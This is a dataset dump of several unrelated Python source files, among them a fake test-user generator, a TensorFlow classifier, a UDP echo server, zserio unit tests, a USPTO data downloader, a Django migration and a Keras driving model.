{"seq_id":"488663193","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Author: hjweddie@163.com\n# Time: Sat 03 Jan 2015 05:14:09 PM CST\n# File: user_generator.py\n# Desc: generate random test users with fake device info and CHINANET IPs\n#\nimport random\n\n\nip_areas = []\n\nwith open(\"CHINANET-20150505.txt\") as fd:\n    for line in fd:\n        items = line.split()\n        begin = items[0]\n        end = items[1]\n        ip_areas.append({\"begin\": begin, \"end\": end})\n\n\ndevices = []\nwith open(\"device.txt\") as fd:\n    for line in fd:\n        items = line.strip(\"\\n\").split(\",\")\n        devicename = items[0]\n        resolution = items[1]\n        osversion = items[2]\n\n        devices.append({\n            \"devicename\": devicename,\n            \"osversion\": osversion,\n            \"resolution\": resolution,\n        })\n\n\nareas_count = len(ip_areas)\ndevices_count = len(devices)\n\n\ndef random_number(length):\n    number = \"\"\n    i = 0\n    while i < length:\n        number = number + str(random.randint(0, 9))\n        i = i + 1\n\n    return number\n\n\ndef random_ip():\n    area_index = random.randint(0, areas_count - 1)\n    ip_area = ip_areas[area_index]\n\n    begins = ip_area[\"begin\"].split(\".\")\n    ends = ip_area[\"end\"].split(\".\")\n\n    ip = \"\"\n    ip_subs = []\n    for index in [0, 1, 2, 3]:\n        begin = int(begins[index])\n        end = int(ends[index])\n        sub = random.randint(begin, end)\n        ip_subs.append(str(sub))\n    ip = \".\".join(ip_subs)\n\n    #print ip_area[\"begin\"], \"~\", ip_area[\"end\"], \":\", 
ip\n    return ip\n\n\nusers_count = 200000\n#users_count = 100\ni = 0\nusers = []\nwhile i < users_count:\n    ip = random_ip()\n    imei = random_number(15)\n    imsi = random_number(15)\n    deviceid = random_number(15)\n\n    device_index = random.randint(0, devices_count - 1)\n    device = devices[device_index]\n\n    users.append({\n        \"deviceid\": deviceid,\n        \"devicename\": device[\"devicename\"],\n        \"imei\": imei,\n        \"imsi\": imsi,\n        \"osversion\": device[\"osversion\"],\n        \"resolution\": device[\"resolution\"],\n        \"ip\": ip,\n    })\n    i = i + 1\n\n\nwith open(\"users.txt\", \"w\") as fd:\n    for user in users:\n        line = \"%s,%s,%s,%s,%s,%s,%s\\n\" % (\n            user[\"deviceid\"],\n            user[\"devicename\"],\n            user[\"imei\"],\n            user[\"imsi\"],\n            user[\"osversion\"],\n            user[\"resolution\"],\n            user[\"ip\"])\n        fd.write(line)\n","sub_path":"test/collectors/user_generator.py","file_name":"user_generator.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"460212916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 29 21:43:39 2018\n\n@author: Chen\n\"\"\"\n\nimport numpy as np\nimport pandas as pds\nimport tensorflow as tf\n\ndef train_input_fn(features, labels, batch_size):\n    \"\"\"An input function for training\"\"\"\n    # Sample a random mini-batch from the data frames (without replacement).\n    rand_index = np.random.choice(len(features),replace=False,size = batch_size)\n    rand_y = labels.loc[rand_index].values\n    rand_x = features.loc[rand_index].values\n    return rand_x,rand_y\n\ntf.reset_default_graph()\n\nlearning_rate = 0.1\nbatch_size = 500\n\nhidden_layer_nodes = 80\nhidden_layer_nodes2 = 100\nhidden_layer_nodes3 = 80\n\n\n# feed the learning rate through a placeholder so the decay applied during\n# training actually reaches the optimizer\nlr = tf.placeholder(tf.float32, name='lr')\nkeep_prob = tf.placeholder(tf.float32)\nx_data= tf.placeholder(shape = [None,10000],dtype = tf.float32,name='x_input')\ny_target = tf.placeholder(shape = [None,3],dtype = tf.float32,name='y_input')\nA1 = tf.Variable(tf.truncated_normal(shape=[10000,hidden_layer_nodes]))\ntf.summary.histogram('weights1',A1)\nb1 = tf.Variable(tf.truncated_normal(shape=[hidden_layer_nodes]))\ntf.summary.histogram('bias1',b1)\nhidden_output = tf.nn.dropout(tf.nn.relu(tf.add(tf.matmul(x_data,A1),b1)),keep_prob)\n\n\nA2 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes,hidden_layer_nodes2]))\ntf.summary.histogram('weights2',A2)\nb2 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes2]))\ntf.summary.histogram('bias2',b2)\nhidden_output2 = tf.nn.dropout(tf.nn.relu(tf.add(tf.matmul(hidden_output,A2),b2)),keep_prob)\n\n\nA3 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes2,3]))\ntf.summary.histogram('weights3',A3)\nb3 = tf.Variable(tf.random_normal(shape=[3]))\ntf.summary.histogram('bias3',b3)\ny_predict = tf.add(tf.matmul(hidden_output2,A3),b3)\n\ncross_entropy = tf.reduce_mean(\n    tf.nn.softmax_cross_entropy_with_logits(labels=y_target, logits=y_predict))\ntrain_step = tf.train.AdamOptimizer(learning_rate=lr).minimize(cross_entropy)\n\ncorrect_prediction = tf.equal(tf.argmax(y_predict,1), tf.argmax(y_target,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\ntrain_data = []\ntrain_label = []\nfor i in range(7):\n    X = pds.read_csv('train_s2/tfidf/train_data_{}.csv'.format(i+1))\n    del X['Unnamed: 0']\n    y = pds.read_csv('label_s2/tfidf/train_data_{}.csv'.format(i+1))\n    del y['Unnamed: 0']\n    train_data.append(X)\n    train_label.append(y)\nwith tf.Session() as sess:\n    sess.run(init)\n    for k in 
range(200):\n        if (k+1)==150:\n            learning_rate = learning_rate/10 # decay the learning rate late in training\n        for i in range(7):\n            X = train_data[i]\n            y = train_label[i]\n            batch_data = train_input_fn(X,y,batch_size)\n            rand_x = batch_data[0]\n            rand_y = batch_data[1]\n            sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y, keep_prob: 0.6, lr: learning_rate})\n        if (k+1)%10 == 0:\n            print(\"epoch {} finished.\".format(k+1))\n    for j in range(4):\n        test_X = pds.read_csv('test_s2/tfidf/test_data_{}.csv'.format(j+1))\n        del test_X['Unnamed: 0']\n        test_y = pds.read_csv('test_label_s2/tfidf/test_data_{}.csv'.format(j+1))\n        del test_y['Unnamed: 0']\n        # per-sample correctness (True/False), saved for later inspection\n        predict = pds.DataFrame(sess.run(correct_prediction, feed_dict={x_data: test_X.values, y_target: test_y.values, keep_prob: 1}))\n        predict.to_csv('stage2_test_output/nn/predict_result_{}.csv'.format(j+1))\n        print('Test set {} accuracy is: {}'.format(j+1,sess.run(accuracy, feed_dict={x_data: test_X.values, y_target: test_y.values, keep_prob: 1})))\n    saver.save(sess, \"trained_models/stage2/nn/model.ckpt\")","sub_path":"model/s2_nn_train.py","file_name":"s2_nn_train.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"434026247","text":"from socket import *\nserverPort = 8008\nserverSocket = socket(AF_INET,SOCK_DGRAM)\n# an empty host string binds to all local interfaces\nserverSocket.bind((\"\",serverPort))\nprint(\"listening on port \"+str(serverPort)+'...')\nwhile True:\n    message,clientAddress = serverSocket.recvfrom(2048)\n    string = message.decode()\n    print(string)\n    serverSocket.sendto(string.encode(),clientAddress)","sub_path":"applicationLayer/UDP/UDPSocketSever.py","file_name":"UDPSocketSever.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"150666124","text":"import unittest\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass AutoOptionalTest(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        cls.api = getZserioApi(__file__, \"optional_members.zs\").auto_optional\n\n    def testEmptyConstructor(self):\n        container1 = self.api.Container()\n        self.assertEqual(0, container1.getNonOptionalInt())\n        self.assertEqual(None, container1.getAutoOptionalInt())\n\n    def testFromFields(self):\n        container1 = self.api.Container.fromFields(self.NON_OPTIONAL_INT_VALUE, None)\n        self.assertEqual(self.NON_OPTIONAL_INT_VALUE, container1.getNonOptionalInt())\n        self.assertEqual(None, container1.getAutoOptionalInt())\n\n    def testEq(self):\n        container1 = self.api.Container()\n        container2 = self.api.Container()\n        self.assertTrue(container1 == container2)\n\n        container1.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n        container1.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n        container2.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n        self.assertFalse(container1 == container2)\n\n        container2.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n        self.assertTrue(container1 == container2)\n\n    def testHash(self):\n        container1 = self.api.Container()\n        container2 = self.api.Container()\n        self.assertEqual(hash(container1), hash(container2))\n\n        container1.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n        container1.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n        container2.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n        self.assertTrue(hash(container1) != hash(container2))\n\n        container2.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n        self.assertEqual(hash(container1), hash(container2))\n\n    def testHasAutoOptionalInt(self):\n        container = self.api.Container()\n        
container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertFalse(container.hasAutoOptionalInt())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertTrue(container.hasAutoOptionalInt())\n\n def testBitSizeOf(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertEqual(self.CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL, container.bitSizeOf())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertEqual(self.CONTAINER_BIT_SIZE_WITH_OPTIONAL, container.bitSizeOf())\n\n def testInitializeOffsets(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n bitPosition = 1\n self.assertEqual(bitPosition + self.CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL,\n container.initializeOffsets(bitPosition))\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertEqual(bitPosition + self.CONTAINER_BIT_SIZE_WITH_OPTIONAL,\n container.initializeOffsets(bitPosition))\n\n def testWrite(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n writer = zserio.BitStreamWriter()\n container.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n self._checkContainerInStream(reader, self.NON_OPTIONAL_INT_VALUE, None)\n reader.setBitPosition(0)\n readNonOptionalContainer = self.api.Container.fromReader(reader)\n self.assertEqual(self.NON_OPTIONAL_INT_VALUE, readNonOptionalContainer.getNonOptionalInt())\n self.assertFalse(readNonOptionalContainer.hasAutoOptionalInt())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n writer = zserio.BitStreamWriter()\n container.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n self._checkContainerInStream(reader, self.NON_OPTIONAL_INT_VALUE, self.AUTO_OPTIONAL_INT_VALUE)\n reader.setBitPosition(0)\n readAutoOptionalContainer = self.api.Container.fromReader(reader)\n self.assertEqual(self.NON_OPTIONAL_INT_VALUE, readAutoOptionalContainer.getNonOptionalInt())\n self.assertTrue(readAutoOptionalContainer.hasAutoOptionalInt())\n self.assertEqual(self.AUTO_OPTIONAL_INT_VALUE, readAutoOptionalContainer.getAutoOptionalInt())\n\n def _checkContainerInStream(self, reader, nonOptionalIntValue, autoOptionalIntValue):\n if autoOptionalIntValue is None:\n self.assertEqual(nonOptionalIntValue, reader.readSignedBits(32))\n self.assertEqual(False, reader.readBool())\n else:\n self.assertEqual(nonOptionalIntValue, reader.readSignedBits(32))\n self.assertEqual(True, reader.readBool())\n self.assertEqual(autoOptionalIntValue, reader.readSignedBits(32))\n\n NON_OPTIONAL_INT_VALUE = -0x1EADDEAD\n AUTO_OPTIONAL_INT_VALUE = -0x1EEFBEEF\n\n CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL = 32 + 1\n CONTAINER_BIT_SIZE_WITH_OPTIONAL = 32 + 1 + 32\n","sub_path":"test/language/optional_members/python/AutoOptionalTest.py","file_name":"AutoOptionalTest.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652698680","text":"# -*- coding: UTF-8 -*-\n# (c)2013 Mik Kocikowski, MIT License (http://opensource.org/licenses/MIT)\n# https://github.com/mkocikowski/esbench\n\nimport os.path\nimport logging\nimport argparse\nimport sys\nimport urllib2\nimport gzip\nimport itertools\nimport string\n\nimport esbench\n\nlogger = logging.getLogger(__name__)\n\n# URL = \"https://s3-us-west-1.amazonaws.com/esbench/assn_%s.gz\"\nURL = 
\"https://s3-us-west-1.amazonaws.com/esbench/appl_%s.gz\"\n\ndef _aa(count=None): \n i = (\"\".join(i) for i in itertools.product(string.lowercase, repeat=2))\n if count:\n i = itertools.islice(i, count) \n return i\n\n\ndef urls(count=None):\n for s in _aa(count):\n yield (URL % s)\n\n\ndef download(url, tmpd=\"/tmp\"): \n\n# \n# # make the ./tmp directory if needed\n# tmpd = os.path.abspath(\"./tmp\")\n# if not os.path.isdir(tmpd): \n# os.mkdir(tmpd, 0700)\n \n fn = os.path.basename(url)\n fn = os.path.abspath(os.path.join(tmpd, fn))\n \n logger.info(\"Downloading '%s' to '%s'\", url, fn)\n \n # if the file already exists, don't download it again\n if os.path.exists(fn): \n logger.info(\"Using cached file '%s'\", fn)\n return fn\n \n resp = urllib2.urlopen(url)\n \n with open(fn, 'w') as f:\n chunk = resp.read(2**16)\n while chunk:\n f.write(chunk)\n chunk = resp.read(2**16)\n sys.stderr.write(\".\")\n\n logger.info(\"finished downloading '%s'\", fn)\n\n resp.close()\n return fn\n\n\ndef unzip(fn): \n\n with gzip.open(fn, 'rb') as f: \n for line in f:\n yield(line.strip())\n \n\ndef feed(nocache=False): \n\n for url in urls():\n fn = download(url)\n try: \n for line in unzip(fn): \n yield line \n except IOError: \n logger.error(\"IOError reading file: '%s'. Looks like the cached data file is corrupted, it will now be removed, and downloaded again on the next test run. Moving on to the next data file - this error will not affect the test run.\", fn)\n nocache = True # this will remove the file in finally clause\n finally:\n if nocache:\n os.remove(fn)\n logger.info(\"removed file '%s'\", fn)\n\n\ndef args_parser():\n parser = argparse.ArgumentParser(description=\"esbench USPTO patent assignment downloader.\")\n parser.add_argument('-v', '--version', action='version', version=esbench.__version__)\n parser.add_argument('--nocache', action='store_true', help=\"if set, delete downloaded data (default: %(default)s)\")\n return parser\n\n\ndef main():\n\n logging.basicConfig(level=logging.WARNING)\n args = args_parser().parse_args()\n\n try: \n for line in feed(nocache=args.nocache):\n print(line) \n \n sys.exit(0)\n \n except IOError as exc:\n logger.warning(exc)\n pass\n \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"esbench/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"248570637","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('tribe', '0011_tribeaudioinspiration_video'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TribeFeedItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('inspiration', models.CharField(max_length=50)),\n ('item_type', models.CharField(default=b'Audio Inspiration', max_length=50, choices=[(b'Audio Project', b'Audio Project'), (b'Audio Inspiration', b'Audio Inspiration')])),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('project', models.ForeignKey(to='tribe.TribeAudioProject')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n 
]\n","sub_path":"src/tribe/migrations/0012_tribefeeditem.py","file_name":"0012_tribefeeditem.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"80411386","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 5 16:38:38 2017\n\n@author: guilherme\n\"\"\"\nimport sklearn\nimport csv \nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom sklearn.model_selection import train_test_split\n\nsamples = []\nwith open(\"/home/guilherme/data/driving_log.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\n\ndef generator(samples, batch_size):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n aug_images,aug_measurements = [],[]\n \n for batch_sample in batch_samples:\n center = '/home/guilherme/data/IMG/'+batch_sample[0].split('/')[-1]\n left = '/home/guilherme/data/IMG/'+batch_sample[1].split('/')[-1]\n right = '/home/guilherme/data/IMG/'+batch_sample[2].split('/')[-1]\n center_image = cv2.imread(center)\n left_image = cv2.imread(left)\n right_image = cv2.imread(right)\n \n try:\n center_angle = float(batch_sample[3])\n except Exception:\n center_angle = 0.0\n pass\n \n images.append(center_image)\n images.append(left_image)\n images.append(right_image)\n angles.append(center_angle)\n angles.append(center_angle) #left offset\n angles.append(center_angle) #right offset\n\n \t\t\n for image,measurement in zip(images,angles):\n aug_images.append(image)\n aug_images.append(cv2.flip(image,1))\n aug_measurements.append(measurement)\n aug_measurements.append(measurement*-1)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=1)\nvalidation_generator = generator(validation_samples, batch_size=1)\n\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \n\nmodel.add(Lambda(lambda x: x/127 - 1.0,input_shape=(160, 320, 3),output_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\nmodel.add(Convolution2D(24,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(36,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(48,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(64,3,3,border_mode='valid', activation='relu', subsample=(1,1)))\nmodel.add(Convolution2D(64,3,3,border_mode='valid', activation='relu', subsample=(1,1)))\nmodel.add(Flatten())\nmodel.add(Dense(1164, activation='relu'))\nmodel.add(Dense(100, activation='relu'))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='tanh'))\nmodel.compile(loss='mse', optimizer='adam')\nhistoric=model.fit_generator(train_generator, steps_per_epoch=1000,epochs=4,verbose=1,\n 
validation_data=validation_generator,validation_steps=200)\n \nprint(historic.history.keys())\nplt.plot(historic.history['loss'])\nplt.plot(historic.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\n\n\n\nmodel.save(\"model.h5\")\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n","sub_path":"model_gen.py","file_name":"model_gen.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"423673117","text":"import game\nimport argparse\n\n\ndef setup_parser():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-s', '--size_map',\thelp='define size of map', type=int, default=20)\n\tparser.add_argument('-sf', '--spawn_frequency', help='define spawn frequency in days', type=int, default = 1)\n\tparser.add_argument('-nd', '--night_duration', help='define night duration in seconds', type=float, default = 1.0)\n\treturn parser\n\n\nif __name__ == \"__main__\":\n\tparser = setup_parser()\n\targs = parser.parse_args()\n\n\tsimulation = game.Game(abs(args.size_map), abs(args.spawn_frequency), abs(args.night_duration))\n\n\tsimulation.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}